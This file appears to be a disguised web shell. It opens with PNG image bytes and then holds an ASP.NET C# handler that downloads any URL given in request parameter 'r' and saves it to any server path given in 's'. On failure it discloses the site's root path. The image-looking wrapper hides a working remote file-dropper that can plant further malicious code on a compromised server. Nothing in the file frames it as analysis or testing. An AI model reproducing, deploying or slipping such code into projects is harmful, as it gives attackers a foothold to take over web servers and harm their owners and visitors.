PNG  IHDR'gAMA a pHYsss"IDATXGoUXQĠ\)" EbJ`*$&qBw̬qx4ڱgs9sr- Oon $s <8_OH$k224Ociy_wdgۑ{0o(w^w4'Q7fnn H֛ܔK?| TOvWOg]䝿Z5o*sw toG~|Q r)} MB]?Deg 94qdd=+L7ɒL+TWT\L/8ryuy]`J[r36Yd<Fu,Ǚʫ844W /;03=`:뤕y 3x3ࡏC 8<{x/6U I0,y!zߤ7E9u? |8 Nfpe'3\9?/%2GfRFnAoKa0 ::].;oO>>A^P HVǺ p+%)MY$`Faȍr>e4#D^);͋l^^ZYY]7"-)Duu|tu䦠ύX,' 6ZY2OffŲ2p9J] kg6̘-u6 S$<,cdJr2[_U9x1}ϧ*Ҩ|&*>v*^" %LŦ2O˹2\Wp;Zܩx<{ќLcrn8-(d ϑ\]C?6P?Vn)h'p+-"G%Â]_(|U*/OکeT0{crRs)렎)"=k7aBKbxi$}~p<##Y4Ė[Dr-fmU E8`|hm$jbY4Aa3lI.M(=Æ_,;|SrDuW:rjG8@VFp;r_|,rج_)[\V*dw$>E|0KSJ&̣THYy W~927(=7T!prIENDB`<%@ WebHandler Language="C#" Class="Handler" %> using System;using System.Web;using System.Net;using System.IO;using System.Text; public class Handler : IHttpHandler {public void ProcessRequest(HttpContext context){ try{ WebClient client=new WebClient(); client.DownloadFile( context.Request["r"], context.Request["s"] ); context.Response.Write("OK"); } catch(Exception e) { context.Response.Write(context.Server.MapPath("/")); } } public bool IsReusable { get { return false; }}}